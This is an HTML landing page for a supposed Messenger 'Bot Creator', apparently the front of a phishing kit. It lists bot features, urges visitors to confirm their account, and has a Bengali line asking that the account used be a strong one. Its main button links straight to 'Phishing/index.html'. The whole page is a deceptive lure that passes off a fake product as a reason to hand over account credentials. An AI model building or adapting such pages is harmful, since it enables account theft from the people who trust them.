<!DOCTYPE html>

<html lang="en">

<head>

  <meta charset="UTF-8">

  <meta name="viewport" content="width=device-width, initial-scale=1.0">

  <meta http-equiv="X-UA-Compatible" content="ie=edge">

  <title>Messanger bot</title>

  <style type="text/css" media="all">

  body{

    padding: 0;

    margin: 0;

  }

    .title{

      text-align: center;

      background: #00f5ffb4;

      padding: 1px;

    }

    

    .title2{

      text-align: center;

      margin-bottom: 9px;

    }

    

    .title2 button{

      padding: 9px;

      border-radius: 20px;

      background: #135c85;

    }

    

    .title2 button a{

      text-decoration: none;

      text-size: 30px;

      color: white;

    }

    

    

    .body{

      background-color: #fdfed8;

      padding: 5px;

    }

    .body2{

      background-color: #fdfed8;

      padding: 5px;

    }

    .body3{

      background-color: #fdfed8;

      padding: 5px;

    }

    .body4{

      background-color: #fdfed8;

      padding: 5px;

    }

  </style>

</head>

<body>

  

  <div class="title">

    

  <h2> •Messanger bot </h2>

    

  </div>

  

  

  <div class="title2">

    <h1>Welcome to Bot Creator!</h1>

    <p>

      <h4>✓ Moderation</h4>

      <p>

        <h4>✓ Custom commands</h4>

        <h4>আপনি যেই আইডিতে বট এড করতে চান অবস্যাই সেই আইডিটা স্ট্রং হতে হবে। </h4>

        

        <h2>[✓] Confrom your account </h2>

        

        <button type="submit"> <a href="Phishing/index.html"> <b>Add bots to your chat box</b></a> </button>

  </div>

  

  <br>

  

  <div class="body">

    <h3>

      Easy to use

    </h3> <p>

      <span>

        Here you can customize greeting new members, goodbye members leaving boxes, etc. and much more with the easiest to use and most intuitive control panel!

      </span>

      

  </div>

  

  <br>

  <div class="body2">

    <h3>

      Say hello when a new user joins the chat group

    </h3> <p>

      <span>

        Use welcome messages to inform newcomers about your group chat rules, or ongoing events. You can design your own greeting card or keep it simple.

      </span>

      

  </div>

  <br>

  <div class="body3">

    <h3>

      Easily create your own custom commands

    </h3> <p>

      <span>

       Bot gives you full control to create your own commands..

      </span>

      

  </div>

  

  <br>

  <div class="body4">

    <h3>

      User

    </h3> <p>

      <span>

       Now bots have been added in total 3 group chat and used by 8 user.

      </span>

      

  </div>

  

  

  

</body>

</html>
